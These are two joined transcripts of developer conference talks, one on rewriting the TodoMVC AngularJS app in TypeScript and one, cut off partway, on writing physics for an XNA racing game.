focus.ts and we'll just bring that in here. Main difference is here. I'm not going to do any class stuff at this point. It doesn't make sense for a directive to be a class so I'm going to convert that to a lambda and this was a late addition to TypeScript. It used to be that you always had to have the parens around the argument for a lambda even if it was just a single argument which was different from C sharp. They've changed it now so if you do just have a single argument and you don't want to type annotate it, you can leave the parenthesis off. I do want to type annotate it. I'm going to go into here, put the parens back in and say ng.i timeout service and then I can turn this into a lambda expression as well and I can say ng.i scope and then here, the element. Directives do go to the talk. You'll learn all about this. It's nice and easy to remember the argument thing though because it's C, S, E, A, unless you're not English in which case you probably don't have a word C in which case it's not that helpful. Sorry. The second argument is jQuery element and I can actually represent that just by saying jQuery and then atras doesn't have a type because atras is an anonymous object basically like a dictionary which has got values in it for all the attributes that have been set on that element. In TypeScript, you can say any which is the equivalent of like C-sharp dynamic to say this can have all kinds of properties on it. I don't want you to do any type checking at all here. Then we're saying scope.dollar watch and we're going to watch the to-do focus value from the attributes and then we are going to, if the result of watching that variable is true, probably easiest to show you the code for this. There we go. To-do focus, it's going to evaluate this expression here. We're going to have a to-do which is in this list and we're going to have an editor to do and if those two are the same thing, then we're going to call lm0.focus. That's all this is doing here, not that complicated. That's that converted over and we now got nice type checking. One of the great things about this type checking is that Angular's API is extremely complicated. If you try and do Angular without TypeScript and without any kind of IntelliSense help, you end up with your IDE open and the AngularJS docs on another screen and probably the Mozilla docs on another screen and your application actually running on another screen and then going to your boss and going, I need a fifth screen. He says, what for? You say Twitter. He says, no user iPad. That's my favorite thing about TypeScript is I don't actually have to learn the frameworks that I'm using. I don't know why that's even open. I hate browser link. Let's just quickly do to do escape and just to make the point, I'm going to go here and I'm going to grab this and I'm going to go here and I'm just going to paste it. I'm not going to do anything to that at all. That's going to work fine. That was fun. Right. It's still not going to work though because we have to do our controller. Directives main difference is the Lambda syntax and in a bit we'll talk about why Lambda syntax is different from function syntax even though function is still valid. Let's move on to the controller class. To go back to the JavaScript, if we go into this to do control here, we can see that it's being declared using.controller which is an Angular module method and then we're creating a function to do CTRL and then we're getting these which get dependency injected and then we're doing a whole bunch of stuff with scope and we're adding functions to scope and everything else. Actually, when you write an Angular controller, what you're pretty much doing is writing one function which just sticks a bunch of stuff on the scope. That's great if you're doing JavaScript. It's not so great if you're doing TypeScript and you want nice clean maintainable code. I am going to drag across my cheating file because you do not want to watch me try to live code this TypeScript and then we will bring across to do CTRL.ts and then we will refresh this and include to do CTRL.ts in the project. Side by side comparisons. We've got a function here that's taking various parameters and in to do CTRL, we've got a class and it's got a constructor which is taking the same set of parameters. Over here, you can see that we've got a private to do storage which is of type to do storage. That's linking me across to my to do storage class that I created earlier on. Angular's dependency injection is going to be able to work out what that is because over here, I am going to remember to say angular.module to do MVC.service to do storage, and then to do MVC.to do storage. That's registering that class with the Angular framework and saying whenever a function has a parameter called to do storage, I want you to pass in an instance of this. Services in Angular are by design singletons. The first time your application asks for one of them, it will be created and then it will just be passed around, never be recreated until someone does a page refresh. It's important to remember that because it means that services are a fantastic place to cache things that you don't want to have to recompute every time you create a new controller or to pass information between controllers. Yes? It does. If I pop back to my to do CTRL and I go there and hit F12, it takes me to there. If I go back, sorry, the question was does Visual Studio's F12 work with TypeScript? The answer was as I have just demonstrated, yes. I forget to repeat the question. If you do this on something from a definition file, it will take you to the definition file and then you can go wandering through there. You will notice that this is an interface. I am not going to create any complicated interfaces, but one of the things about interfaces is that you can have overloads. Obviously in JavaScript you can't have overloads because you can't declare the same function twice. You will just end up overwriting the previous function. Things like jQuery and Angular do very complicated things when you first call a function and say, what have I been called with? Is it this? Is it that? Is it the other? In TypeScript interfaces, you can declare the method over and over again with all the different signatures and that gives you nice IntelliSense and Type checking and everything else. In my to-do controller, I have got my scope and so forth and I am going to set up this. I am going to call to-do-storage.get and keep the to-dos in this public section up here. I have created an to-do interface. These are just being serialized to and from JSON, so they can't actually be a class. I can't declare a class with properties because JSON doesn't know about classes and properties. In order to give myself some IntelliSense, I have declared an interface for my JSON objects. I have also created an interface for an IStatus filter which you will see further down as well. I have got that there. Then I am setting up scope.on. When the root changes as part of AngularJS is rooting, it is going to call this.onrootchange. When I first started doing TypeScript and Angular together, and actually I wrote and launched an entire project using this approach, the problem when you said my scope is of type ng.iscope is if you then come along like they do in the JavaScript code and say scope.to-dos equals something, then TypeScript goes scope hasn't got a to-dos property on it. Then you end up going how am I going to deal with this? What I started out by doing and what you will see in the current official TypeScript Angular solution on to-do MVC is export interface, itodo scope, extends ng.iscope, and then putting in like to-dos. Then I would be able to still get the intelligence on all the scope stuff, but I would add in all this stuff as well. This, however, was hideous, and the main reason it was hideous is because you are not making the best use of a class, you are essentially just creating a class and then using its constructor to set up a bunch of scope stuff. More importantly, you end up with this split responsibility where you are in your class and you are adding functionality or properties to the scope, but in order to do that you have to go and change the interface as well. Any code practice that requires you to make a change in two places just to change one thing is not a good coding practice. Like I say, that didn't stop me from building and launching an entire product with it, but then they released a version of Angular which added some additional syntax. What people had been doing in order to get around this limitation was adding the controller itself as a property on the scope, which you can do if you use a string indexer, then type checking goes away and you can do what you like. I don't recommend you use the weird opening quote that's found its way into my PowerPoint slide, but yes, and then you can bind to things on the controller. The Angular guys thought this was a good way of working, they quite liked it, and so they added a controller as syntax to the routing system. I'm just going to bring in to do MVC.ts, we'll copy that across as well, and bring that in here. Yes, this is where we're setting up our routing, and we're basically saying when we go to the route, then just display the page normally. When we go to the route with a status argument, then do the same thing, but we'll do some extra stuff inside the controller. But on both of those, we've got controller as to do CTRL. Take that out because that will certainly annoy me later. So yes, what that does is it automatically, when it creates an instance of to do CTRL, adds it to the scope for the current element and gives it the name to do CTRL, which means in our index.html, we can reference anything that's exposed on that controller object by prefixing things with to do CTRL. Which means I don't need to put anything on the scope at all, I can just say this.todos, and then from my HTML, I can bind directly to those to dos on the object down here. So I can bind to my properties, and I can bind events to methods on my controller in a similar way to the command pattern in MVVM. And actually, in my more complicated thing, I've actually re-implemented the command pattern, and I have a command object which has got an execute and can execute method, and it's all very WPFE, but in a nice way. Properties. Properties are the reason you don't want to support ECMAScript 3. TypeScript has syntax for declaring properties on a class. It's from ECMAScript, and it wraps around the object.defineProperty functionality that's built into ECMAScript 5. If you have targeted ECMAScript 3, then it will not be available. And if you have created a new project and you haven't gone in and hacked around with your templates, then at the bottom of your.csproge file, you get various settings that tell it what version of TypeScript to target. You want to change that to ES5, and then you will be able to use properties. It's one of the things that comes up when you have the discussions about my framework is better than your framework and my dicks bigger than your dicks and all this sort of thing. Mbjs has computed properties. Knockout has computed observables. They've both effectively invented properties. They've invented a custom way of doing properties. Angular, because it just binds to plain old C-sharp objects, you can just bind to properties, which means in TypeScript, we can declare them as properties. So if we go back to the JavaScript code, you can see that one of the things that it's using the scope for is to say every time the to-dos collection changes, I want to change remaining count and completed count and all checked on the scope, which is not really the best way of doing things. In TypeScript, we don't have to do that. We can just say I'm going to have a property called completed count and a property called remaining count and a property called all checked. And I'm going to calculate that on the fly, which is similar to what you would do with a computed observable in knockout or a computed property in ember. And within there, I've just created a standard count because JavaScript doesn't have a count, but it does have reduce and all checked and so forth. And yes, it does. Where's the do-storage-gone-put? That's it. Okay. I've then also got a whole bunch of public methods, and these are all bound to click events in the HTML code. So there's an add feature, which gets called and you type in a new to-do value there. Probably worth just seeing if I can run this quickly so we can actually see what we're talking about. Should have done this about half an hour ago. Yes. There we go. So yes, this is what it looks like. And so when I type something in there and hit enter, the forms submit event is bound to that add to-do method on my TypeScript class. Stop. So yes, an edit to do and a move to do and all these things are implemented as methods on this class just using normal things here, normal method declarations. Again, I've put public on them. Now, actually, I don't have to do that and I could mark them all as private. It would still work. I just, at this point, I'm using public and private as a note to myself to say, this is a method that I've put on this class to be consumed from binding in the HTML. And if I've got it marked as private, like, for example, save is marked as private, then that's going to be called from inside the class. It actually doesn't make any difference at all. Like I say, public and private are discarded by the time you get into JavaScript, which means they will all be visible if you want to bind to them from your HTML code. But try and, I like using this pattern to remind myself what the hell I've been up to because I tend to forget usually after about two minutes of Twitter. Now, up at the top, I've set up an event handler here. You get all sorts of events generated by Angular that are sent around on the scope. And what I'm doing is saying when I get the root change success, so when the URL that we're currently on changes, that won't necessarily trigger a browser refresh because we're after the hash now because this is a single page application. So Angular watches the URL and tells you when it's changed. And I am calling this.onrootchange. And if I jump down to that, you can see that I've forgotten to put this in there. And I've forgotten to put a private on my root params. There we go. That works. But I am using a different way of declaring a method here. Type script 0.8 first version and quite a few subsequent versions. There are problems with the way you declare methods. And if we go and look at the JavaScript that has been generated for to do CTRL.ts, you can see that all the methods are declared on the prototype and they just, they have normal this and everything else. That's great because they are methods. But JavaScript doesn't really appreciate the difference between methods and functions. And they are two separate things. And you get into this problem with what this actually means. And this means whatever that function has currently been bound to. So when you call add to do, for example, and you call it by saying to do CTRL.add to do, then this refers to that instance of to do CTRL because you've accessed it through the prototype. If you pull that function off and pass it somewhere as an event handler, this points to the function's own little context that it's created for itself to float around in. Is that a hand up for a question or a stretch? Okay. I'm sorry to draw attention to your aging body. That causes a problem when you're doing event handlers like this on root change. And this, once you'd pulled it off, you wouldn't be able to see this dot root params because it would not be set on that particular context. And there were various ways around this. You could say this dot on root change dot bind this and that would tie that function to the current context. The other thing that people did quite a lot was they would create an anonymous lambda there, which would also have the same effect. But this was such a common pattern with various frameworks that the team decided to come up with this alternative and fully supported approach where what I'm doing here is I'm not really creating a method. I am creating a function and assigning it to a property on my class. And there's a very important distinction between this when it's inside a lambda. If we go and look here, so all my normally defined methods are declared on the prototype as you would expect. But my on root change is actually declared as a property on this while the thing is being set up and it's created and underscore this variable up here. Quite a common pattern in JavaScript and then inside this function it's using that instead of the built in this. That's default behavior for a lambda. If you create a lambda and refer to this inside the lambda, then it will use this closure underscore this variable. So you can be sure that it's always going to point to what this was in the right place. This does trip you up sometimes and you end up having to actually write functions for jQuery, for example, where you wanted to use what this would have been. And so if you fall over that, then you have to revert back to the function syntax and put in the resharper comment that says stop telling me this can be converted to a lambda, you don't know anything. So that now is everything in my TypeScript application. I'm just going to check that I've got all my includes down at the bottom here. What I need to do for Visual Studio's sake is select all of these and include them in the project. And then run it. And there we go. There's my TypeScript version of this. Done. That's it. Basically, that's the Todo MVC application implemented in TypeScript the way I think it should be done, also known as the right way. I will put this up onto my GitHub. I will also be submitting this back into the Todo MVC's project because the current TypeScript implementation is not 100% the best way you can do things. Do I have any slides left? Yes, but those are all rubbish and pointless. So tools, if you're using an IDE, then Visual Studio 2013 for the.NET guys, make sure you've got web essentials installed even if you're not doing TypeScript or Angular, even if you're not doing web development, to be honest, it's just essential. Resharp 8.1 I was using, that's got great TypeScript support. If you're on a Mac or Linux box or you don't want to pay a fortune for Visual Studio Pro, then JetBrains WebStorm is superb for working with TypeScript. Adobe Brackets, if you've seen that, that's quite fun for playing with. That's got TypeScript code completion plugin syntax highlighting, there's various packages for Sublime Text. If you're just hardcore Vim and you don't want any of this sort of stuff, then you've got command line tools in Node, you can do NPM install minus G TypeScript, and then you'll get a TSC. There is a Grunt plugin called grunt-TypeScript, which you can include in your grunt file. If you're a Gulp user, then for cough. You can use grunt to compile it and minify it and annotate it and all this sort of stuff. That's basically it for the talk. Any questions now quickly? I will be around for the rest of the conference if you want to come up and ask to look at some actual code or solve a specific problem. Very happy to help you with that. Any quick questions now? No, no, I covered everything in such detail that there's no questions left to ask. If you want to pursue this further, AngularJS.org, TypeScriptlang.org, GitHub.com, Boris Yankov, that's definitely typed. Just Google, definitely typed. It comes up. You can get hold of me through those things down the side there. If you're using Azure Storage, please buy Zudio. That's it. Thanks very much for coming. Enjoy the rest of the conference.
AngularJS is Google's answer to client-side JavaScript MVw application development. TypeScript is Microsoft's answer to working large, complex JavaScript code-bases, bringing static typing and EcmaScript 6 features to current browsers. The unholy pairing of the two bears fruit that is, quite possibly, the best data-bindy, view-modelly, uber-productively effective development system I've ever used (and I've used a lot). Come and learn how to splice the DNA of framework and language to create AngularTS, and get the joy back in your programming life.
10.5446/50576 (DOI)
Good afternoon. Welcome to the session that I'm going to be delivering on game and simulator physics for developers, gamers and petrolheads. My name is Alan Smith. I work for a consultancy company in Stockholm called ActiveSolution. You can probably tell from my accent that I'm not from Sweden, I'm actually from the UK. My main focus is working on Windows Azure, cloud computing and working with customers who are moving applications to the cloud and want to leverage Windows Azure services. I recorded a course for PluralSight and during recording that course I wanted something that was going to be a fun way of showing how we can leverage Azure services. So I took a sample game that Microsoft had developed on the X&A platform, integrated it with Azure services. And during the development I kind of got a bit carried away with looking into the game code. Gaming and game code is very addictive. So if you start playing around with this stuff on Friday afternoon, kiss the weekend, goodbye, you're going to be spending all weekend playing around with this stuff, it's great fun. You can get addicted. I did spend a lot of time looking into working with physics and simulations in the actual game to try and get the game a bit more realistic. And I've been doing some presentations on this, so I'm not a game developer. I don't really do this as a full time job. This is more of a hobby session. But I think there's a lot of stuff that we can learn with building applications where there's some kind of visual user interface. It really, really helps and makes the applications feel better. Strange concept, you know, you don't actually touch the application, you see it and hear it and maybe feel it a bit if it's got some vibration or tactile feedback in a controller or in a phone. But it's really, you know, you talk about the feel of an application, you can really increase that if you understand a bit about how physics works. So the project that I've been working on with integrating a racing game with Azure, I've given it the title of Red Dog Racing. If you watch any Formula One, you'll have heard of Red Bull Racing, who is a Formula One team. And if you've followed Windows Azure, you'll know that Red Dog was the actual original code name for some of the Windows Azure technologies. So I kind of, you know, mixed those two together and came up with that actual name for the game. Disclaimer, I've done this session a few times and another session on the Azure integration and telemetry and stuff. And people, you know, come out of the session with the assumption that I've actually written the game. I did not write the game. It's developed by Microsoft. It's available as a sample application for the XNA platform, which is now available on CodePlex. If you want to play around with this stuff, you can go and download the full source code and models available at that URI. I mean, if you just go in and search for XNA racing game, you'll get the actual codes to download and play around with. What I have done, though, is done lots of modifications on the game. I've rewritten the physics engine completely for the way the car interacts with the track and all of the actual forces. Modified some of the textures to actually customize it to put the Windows Azure logo in it and our company logo in it. Modified the track layouts, integrated the game with Azure services. So the replay data for ghost cars is going into blob storage, lap times and telemetry data into table storage. And I'm using the Azure service bus for telemetry data streams. And that's really, I'm not going to talk too much about that today. That's kind of the Azure and cloud computing side of things. I've built a website that shows the gaming stats. So you will see a lap times and telemetry data available on that website if you're working on the game. I've also added sort of a camera track mode and been sort of playing around with various bits during the game. So why am I doing all this? I'm really passionate about Microsoft Azure as it's now called and cloud computing. And I think there's some massive opportunities for organizations and for developers to start leveraging these cloud-based services. So that's basically what my main focus is. I was kind of a physics geek at school, so I was really into all this kind of stuff, you know, forces, masses, accelerations, vectors and doing all these types of calculations. It's something that I could naturally do and naturally get my head around when I was sat in the class at school. Probably one of the only things that I could naturally get my head around. I'm a Formula One fan, so I'm, you know, watching the races every weekend. And I'm really, really interested in the technology and the physics that goes into making these machines work. The Lotus team is actually sponsored by Microsoft and Avanade. And a lot of work has gone into using the services in Windows Azure to get the telemetry data from the car to the pit lane and then back to the actual factory in the UK so they can see what's going on in the actual racing as well. And I like playing driving games. Forza Horizon is one of my favorites. I like the way it's not, you know, a serious racing game. It's kind of an open world but with good physics and good playability. So I'm kind of more into that style of games. And as I mentioned, you know, the main scenario behind this is to provide an integration between the application and Azure. I deliver a lot of sessions on this. I use this in my training courses. I do racing game workshops where you can do hands-on labs integrating this stuff with Azure. And it's kind of a nice way of showing something that people can relate to and how it works with a cloud computing platform. So a bit about the game and simulator physics. Really, when you're thinking about building physics into a game or into an application, you've got to make a lot of decisions. And one of those is, are you going to focus on building a simulation or are you going to focus on playability? So a couple of videos basically are going to show sort of what I mean by that. Now, when you look at a pure simulation, it's going to be something like this. This is at the actual Red Bull factory in the UK. And this is the actual kind of simulation rigs that they use for Formula One cars. They cost millions and millions of dollars. They're highly complex and they're really designed to actually provide the most accurate simulation as they can on the actual car. They're limited in testing in Formula One. So if they put a new front wing on the car, they want to be able to model the down force that that particular design of front wing will place on the car and how that will affect the car going around the track. So these fantastically complicated machines are basically, you know, what they're really focused on. So they're going in for the sort of a pure simulation at angle of things. If you look at, you know, what people start doing at home is anybody into sim racing and, you know, building these kind of rigs at home. I have a couple of friends in Sweden and down in their basement, they basically do things like this. So they spend, you know, sort of thousands and thousands on just building these types of things. A friend of mine from his wife for Christmas, he got two 27-inch monitors to go next to the other 27-inch monitor that he'd got in his basement to basically build one of these driving rigs. So they're basically, you know, highly complex, a lot of money that they put into these. And, you know, really, this is a game going towards the simulation side of things. These people get really offended if you say that they're playing games. They're not playing games. They're driving a simulator. It's not a game. It's a sim. And they've kind of focused on those types of things. Spending thousands of Kroner on a gear stick or 10,000 Kroner on a racing seat just so they're going to get that simulation. And if you think these guys are bad, you should see what the actual flight sim people build. These basically flight sim rigs, you know, they get incredibly complex. There's one, you know, this is the one I was looking for. And you imagine what the wife approval factor of building that in your dining room is going to be. But that, you know, kind of really focused on the simulation side of things. They really want the pure racing angle, whether it's flying or whether it's racing cars. However, maybe that's not going to be the thing that makes a game playable or makes an application, you know, worthwhile for the user. I take to have a Formula One racing game where I'm driving for over an hour and then the engine overheats or one of the tires bursts. You know, because that would, you know, happen in Formula One. If I was pressing the accelerator pedal too hard or if I was, you know, driving too fast around corners, it would destroy the tires. And the tires would burst as it sometimes does during racing. So you've always got this compromise between, you know, building in some playability and actually having the, you know, total accurate simulation for the people who are going to be actually driving these games. I saw this quote. I love this quote. And I can't remember whether where I saw it, if it was on a t-shirt or if somebody tweeted it or if it was just on a sticker on a website. And it's talking about the way that we can get immersed in computer games. And, you know, much to the effect that the, you know, the computer game physics seems more realistic than that, than the real world. I remember playing Quake and then going around the supermarket and you get this thing where you're going around the aisle, you know, expecting a rocket to come down the aisle because you've been so immersed in that, in that game world it was starting to, you know, and pinch into the actual real world. So really thinking about when you're actually building the physics into a game, that's one thing you have to think about. The original X&A racing game, I've got a sample out here which is sort of based on using the original physics engine in the game. The idea behind this game was to develop something that was playable. It used a lot of the X&A features. But what was not a high priority in the development of this game was implementing a physics engine. One of the things that the developer decided not to do was to actually reach out and use a commercial physics engine and bring that code into the game. So if we actually go in, I'm just going to change the actual settings so it looks a bit more appealing on the actual resolution. And we go in and start the race. You can actually go around and I kind of think that, you know, considering the physics is so basic, it does have a fairly nice, nice feel to the game. You get the acceleration. In this modified version you can see the ghost cars coming from Azure Blob Storage from the other players in the lab. But if you start to actually, you know, think about what happens and how they've implemented it, they've done a lot of shortcuts. And it's a question of, you know, does the player notice these shortcuts? The car does not steer. The car rotates. If I'm moving the mouse, we've got this kind of rotation. So you remember asteroids in the 80s, that little, you know, ship that rotated. It's the same thing as that. And so when you're going around a corner, you get around a corner. If you can actually move the mouse quick enough to rotate the car and change its direction as you're going around the corner. There's no such thing as centrifugal force. So I, you know, took that corner at a really high speed. In a real world, the car would have slid. There would have been some tire friction. And that's not present in the game. So what I did when I was working with this game, you know, I put this game out on a click once deploy and a couple of my friends played it. And one of them who played it was, you know, my friend who's got this big SimRiga in his basement who plays at SimRacing a lot. And his comment was, you know, this, you know, the game is okay. It's fun. It's a good way of showing off our, oh, however, the physics in it is terrible. It doesn't actually do physics at all. You may as well be steering a banana around the actual track. You're just steering an object around a 3D landscape and there's nothing related to physics. So I kind of thought, okay, okay, if that's a problem, you know, I'm a developer, I'll go in and I'll fix that problem. So what I decided to do, and this was kind of over Christmas, was to actually rewrite the physics engine for this game. So what I was going to do, I was going to start with the X and A race of code. I wasn't going to build my own game. You know, that's got a lot of this stuff in there that I need to play around with. All I'm going to do is, you know, swap out and swap in my own physics engine. The game style I'm going to play on is going to be fun arcade style gameplay. You know, I do these as well as racing game workshops where people come in. The people who, you know, come to these workshops are mostly not, you know, really into the simulation. They just want something that's going to be nice and playable and maybe have a nice feel to it. So I'm more focusing on the arcade style gameplay than the actual realistic simulation. The code I was going to use and the ideas that I was going to base this on was going to be on the physics I learned at school. Another scenario of this, I think it would be a great way of, you know, communicating with kids about getting them into programming and games and also, you know, reinforcing the stuff they're learning in school about vectors and matrices actually has real world uses when you think about using them in games because it is literally the stuff I was learning when I was sort of 14, 15, 16 years old in the math lessons at school. And that's basically the level of maths and physics. I'm not going to go into advanced physics or university level physics. I'm going to keep it at the actual school kid level. I wanted to learn a little bit about game physics. You know, I've been playing games for a long time and I wanted to know about what goes into it to making those games at work. And what I was not going to do is to go into loads of massive complex equations and build realistic SIM style physics. I didn't want to bring in an existing physics engine or start reading people's blog posts or start, you know, copying and pasting big chunks of code into the application. I wanted it to be really a learning exercise for myself. And, you know, as I mentioned, I wasn't going to, you know, take in an existing code sample for this. I wasn't going to build on Unity. Unity, the game development platform, actually has a lot of, you know, physics services built into its own physics engine. It's got things like wheel colliders that you can use. And I kind of, because the people who come to my workshops and I present to a.NET developers, they want to be working in Visual Studio, Unity, although you can use Visual Studio, has a very different development environment. So I kind of wanted to keep people happy when they're actually working out with the game. So this is what I did. I basically went in and I rewrote the physics engine without really thinking too much about what I was doing and without actually doing any planning. So the first thing was to get the car stationary on the track with no external forces acting on the car whatsoever. The second thing was collision detection. I wanted a realistic way where the actual car would collide with the track in a realistic way. Also, when you're collided with a barrier, you should actually be pushed back onto the track. One thing I wanted to include that's not in the original game is jump physics. So I wanted to have a realistic way where you could actually jump and when the actual car landed, it would, you know, properly simulate the way that the car collided with the ground and maybe put in some damage simulation, you know, to actually actually get that to work correctly. So as you can see, I mean, all of the physics is going wrong here. The other thing was loops as well. There are loops in the game and I wanted to get a realistic simulation of how the actual car travels around a loop with centrifugal force. Now, watch the MPH on the car when we hit the earth. The car actually gets to a speed of 44 times the speed of sound, some of the actual segments in this. Now, this was great fun. My daughter loved it. She kept wanting to have this game with a flying car and have these cars flying around. But it is just, you know, I find it really funny, you know, just playing around with these numbers and equations and this starts happening and you're trying to debug and, you know, debugging something that runs at 100 frames a second or 50 frames a second is very, very challenging to do. So I kind of, you know, stepped back from there and says, okay, you know, I did get a bit depressed for a while until I started going around on YouTube and looking at what happens in, you know, sort of real commercial games as well. That was Scandia Truck Simulator. I'm not sure what this game is, but there's something very going on with the physics. So this one's GTA. I thought the physics was good. I just included this in because there is actually no car for some reason. It's missing out at the rendering of the car. And falls to the horizon at one of my favorite games is this glitch where the car actually can go off the end of the world. And you can see that two of the wheels are actually, you know, actually working on the actual ground but the other two aren't. And there's this beautiful section here where you drive through and it kind of falls through the game well. And I'm glad that it's not just me who sees the underside of a game world with the actual car falling and spiraling away like that. I kind of think that, you know, I really like the energy that people put into games and physics. One of my favorite examples is this, which was available on Steam. And this was a game called the Next Car Game. Excuse the advert that will come up in a couple of seconds. I can skip this. And what they did was they put out this kind of test bed application to test the actual physics engine so players could go around and have fun with it. The thing was that this actual test bed application was actually a lot more fun than the game that was produced out of it. And so many people were just going in and downloading this demo to run through the actual physics. But the destruction physics that they've put in to actually make it, again, this isn't real world. But they're simulating a lot of the forces on the car on the destruction physics. That's really what they're going for. And I think it's a fantastic user experience to actually see how this work and what happens when you drive through like a mangling machine, all of the bits flying around and doing stuff. And the car can still reverse and go through the next one. And it comes out like that and bounces around. And then the engine still works and the wheels still rotate even when the car is in that type of format. So it's really impressive, you know, what they can do with putting the amount of energy into working with those formers. And also, the gaming platforms that are coming out can actually do the sums that make this type of stuff as much as possible. So does anybody know who this guy is? Isaac Newt. And it's not James May from Top Gear, although it does look very like him. Everybody learns about him at school. He came out with the laws of motions and the theories of gravitation, really famous for that. And a lot of the stuff that I've used in the game is based on those, those laws of motion, laws of gravitation. This one's a bit harder. Oiler. Oiler. Yeah, you're the first person who's got that and I've done this at this session a lot of times. And you've also pronounced it correctly as well. Leonard Oiler. A couple of things that he was responsible for. One of them is the Oiler integration, which is kind of a basic way of doing simulation in game physics. And I'll talk about how that works a bit later on. It's not the best way to do it, but it's probably the easiest way to get in and start simulating physics. When I was reading up on him, another thing that he had worked with is graph theory, which was really interesting because this is now becoming really something that's really talked about with graph databases, social networks, Twitter and Facebook and all of the actual relations and how you follow certain people and certain people follow you. All that type of stuff was something that he was also behind coming up with a lot of the actual ground at ground theory for that. So what I started doing was working out the actual forces that are going to be applied to a car. So there's a car. We've got obviously gravity pulling the car down onto the track. The car's going to be going forward. We've got an engine which is powering it. So we've got some kind of traction or force. We've also got some kind of rolling friction. So as the car starts to move, this is the friction in the wheels going around, the tires on the road, all of the actual mechanical joints within the car. And when the car starts, when you start pushing a car, it is that getting the car to move, the actual momentum and the rolling friction that you're overcoming. So at low speeds, rolling friction is going to be the biggest inhibitor on the force, the car. As the car accelerates, aerodynamic drag is going to overtake the rolling friction. Does anybody know why? So rolling friction is proportionality of velocity. So if you double your velocity, you get two times the rolling friction. Aerodynamic drag is proportional to the velocity squared. So if you double your velocity, you get four times the aerodynamic drag. So aerodynamic is one of the really big forces on the car. That's why if you accelerate from the difference between 100 kilometers an hour and 110 kilometers an hour, the fuel efficiency of your car drops off a lot because there's a lot more aerodynamic drag for that smaller extra speed. Now if your car's designed correctly, if it's a racing car, and this is what they really go into in Formula One with their simulations and the way they design the cars, is the actual downforce. So you're going to get more downforce which is pushing the car down on the track. And that means that you can go around corners faster because the ratio between your downforce and the actual sideways of centrifugal force is going to be greater and that's going to actually hold the car on the track. So Formula One drives are really into maximizing of the downforce. And once we've calculated these forces, we can work out the acceleration on the car. Because as Newton says, force is equal to mass times acceleration, so acceleration is equal to the force divided by the mass. The weight of the car is going to determine how fast the car is going to accelerate. So applying these basic laws of motion to say a car driving off a barrier like that, what you'd be doing is doing something like this. S equals ut plus half at squared. Again, this is physics that you learn at school. The displacement is s, which is going to be where you're going to land. u is the initial velocity. And if you're talking about the vertical velocity, that's going to be zero. t is the actual time, and then a is the acceleration. So you can basically calculate, and this is what you do due to past exams at school, where the car is going to land based on how fast it's traveling, how high the actual barrier is. But you make some assumptions. First of all, you assume that there's no air resistance. Secondly, you may assume that the earth is flat, which you can do in these actual simulations where you're talking about a small game world. So the Euler integration basically says, OK, we're going to do these same calculations again. However, we're going to be doing them a lot of times. We're going to be doing them multiple times a second. And you will have a frame rate for your game, which is every time this calculation is done before you actually do your rendering. So what the Euler integration will do is start doing these calculations at multiple times. So you end up with something like that. And this is where the inaccuracies come in. And I've noticed this in the game that because the XNA for its vectors uses floats rather than doubles, you get a lot of floating point inaccuracies. And if the game is running at 50 frames a second, the car will accelerate a lot faster and go faster than if the game is running at 100 frames a second. Because you're doing a lot more calculations and you get a lot more inaccuracies in the actual engine. And I had scenarios where sometimes I'd run in a low resolution, the game will be running at 250 frames a second and the car just wouldn't accelerate. So we do need to go in and put in more compensations for that. Again, it's the thing, are you going for playability or are you going for an actual physical simulation? Termal velocity is another thing. Termal velocity is something that is very misunderstood. The people who really understand it best are skydivers because they need to because their life depends on it. Termal velocity is basically you get an object and it's when the force due to gravity is equal to the force due to the aerodynamic drag and you basically reach an equilibrium where you'll be actually free falling at a constant speed. So for a skydiver falling out of a plane in the actual position when they're like that with the wind going against their stomach, they will fall at about 125 miles an hour. The world record for a speed skiing is close to 200 miles an hour. They may have exceeded 200 miles an hour, which is 75 miles an hour faster than skydivers fall. Because the speed skiers go into an actual atop position. Snow has a very low terminal velocity because it has a low mass compared to it's air resistance. So the gravitational forces that fall very slowly. So terminal velocity isn't a constant, you know, things fall at different speeds because of the air resistance. Now if we turn that the other way round, the car will have a terminal velocity because eventually the aerodynamic drag is going to be equal to the force that's put in by the engine. And the car won't be able to accelerate any faster than that. And it gets more complex when you start to bring in gear ratios and max RPM and rev limiters like they'll have in Formula 1. Normally they'll reach a terminal velocity when they reach the rev limiter in the actual fastest gear that they've got. Another thing that we've got to think about is how the car is going to go around corners. Now as I mentioned in the original version of the driving game, the actual car rotated. And I wanted the car to steer. So I started drawing all these diagrams on bits of paper and saying well if the wheels turn like this then we've got a turning and we've got a wheel base then. From the actual angle that we've got we need to calculate the actual turn radius. So we're doing various sums to be able to actually get these calculations working. And this was again stuff that I did with a pencil and paper and just figured out from stuff I'd learnt at school. We're using signs, cosines, tangents to take these various angles and calculate what the various outputs are going to be. So I've got a lot of kind of formulas like that where I'm returning one property based on various other properties in the actual engine. And what's going to happen as you go around a corner is you're going to get lateral force. The lateral force is going to be pulling the car sideways and you've got to start calculating about how that's going to play in with all of the other forces that are coming into the car. Within the game we typically have something called a game loop. Now the game loop looks something like this. While you're playing the game you're going to get the player input and that's going to be coming from the keyboard, from the mouse, from an Xbox controller. Once you've got the player input you can actually feed that input into the physics engine. So then you're going to be doing the actual Euler integration calculation, calculating all the game physics. That's going to figure out where everything is going to be during the game. After that the next thing you're going to be doing is just rendering the stuff and putting that on the screen. So you're just going to be whizzing around that loop 50 times a second if you're running on a fairly decent hardware, maybe 80 or 100 times a second, 30 times a second. And I've actually built the game to be run as a variable frame rate game. So it will take into account the actual frame rate time that we get from the game engine every time it's doing this calculation. Sometimes when you get more objects on the screen the frame rate will slow down but the calculations of the speed per second, the car should always feel that it's travelling at the same speed, even if the actual frame rate of the game is going to be changing, which it will do if you've got different things going on. As you can see this is what I'm doing. When I actually call into the game, and this is XNA code, I'm getting this floating point value which is the move factor. The move factor will be fractions per second. So if you're running at 10 frames a second it's going to be 0.1. If you're running at 100 frames a second 0.01 and so on. I then go into the physics engine and pass in this actual variable and it does all of the calculations based on that particular move factor. And then we're basically updating the car's position. We have a matrix data structure and you'll have matrices, you've got them in XNA and you've got them in Unity as well. It's basically going to describe how the car is displayed on the screen. We call this method to update the car matrix and the camera and that will basically give us the position of the car. And then we can actually place the car on the track. Now that's a very simplified from what it looks like in the game. It is quite a bit more complex than that. So when I've basically gone through and come up with the formulas, what I did before actually going into the 3D world, because that's where everything won't really pear shaped when I actually tried to actually code it off the top of my head, I decided to simplify things a bit. So what I did was decided and said, okay, you know, start this off in 2D and see what happens when we build a 2D simulation. So this was kind of what I was playing around with first. It's a very simple Windows presentation found application where the, you know, a timer going in the background. And what I'm doing is, you know, that calculation that I had in the slide deck is basically this here. I'm figuring out what the steering 